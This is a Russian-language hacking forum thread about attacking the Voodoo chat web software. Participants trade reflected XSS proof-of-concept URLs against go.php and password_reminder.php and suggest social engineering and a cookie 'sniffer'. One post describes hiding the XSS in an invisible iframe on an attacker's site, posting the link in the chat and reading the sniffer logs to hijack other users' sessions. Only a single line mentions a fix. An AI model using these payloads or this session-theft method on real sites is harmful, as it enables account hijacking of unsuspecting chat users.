Voodoo чаты
 

Через фрейм отправки письма возможно ломануть?

Вообще то как говорят Vodoo нельзя ломануть ...
Дай линк Vodoo посмотрю похож ли на мой чатик...

Сломать можно всё.
Сниф + СИ + знания php

В чате есть пассивные xss. Так что ищите.

Я нашел алерт но снифф туда впихать не получается .. вот так вот :( лажа(

Гы ...а ты сможешь например? И еще причем тут СИ ?
Я так понял что ты это имел виду потому что пхп и СИ связаны друг с другом, или как ? :confused:

СИ - социальная инженерия
Там можно кое где оставить ссылку на снифер, а дальше дело техники =)

Вы бы хоть писать научились...Если вы про чат то пишется Voodoo chat(модер переделай название что ли)
Выкладываю на паблик давнейшие хсс(попробуйте исполльзовать с фреймами...)
------------------------------
Type:[XSS]
Product: Voodoo chat
Author:qBiN
exploit: http://victim.com/chat/go.php?url=javascript:alert(/Tested%20by%20qBiN/);
Решение: фильтровать переменную урл,можно даже проверять её на валидность
с помощью сокетов.
------------------------------
Type:[XSS]
Product: Voodoo chat
Author:qBiN
exploit: хттп://сите/chat/password_reminder.php?look_for=%3Cscript%3Ealert(/qBiN test/);%3C/script%3E
------------------------------
для спасибо есть репутация,не загаживайте форум.

Это то я понимаю, но вот вопрос весь в том что ссылки открываться через другую страницу http://www.chat.ru/go.php?url=http%3A%2F%2Fwww.test.ru
Тоесть снифер не сможет сессию прочитать.
А вот через фрэймы это как ?

Уже апсуждалось...Создаешь сайт с невидимым(или маленьким) фреймом(который указывает на хсс),кидаешь линк в чат и смотришь логи,там вроде на сессиях,так что не проворонь.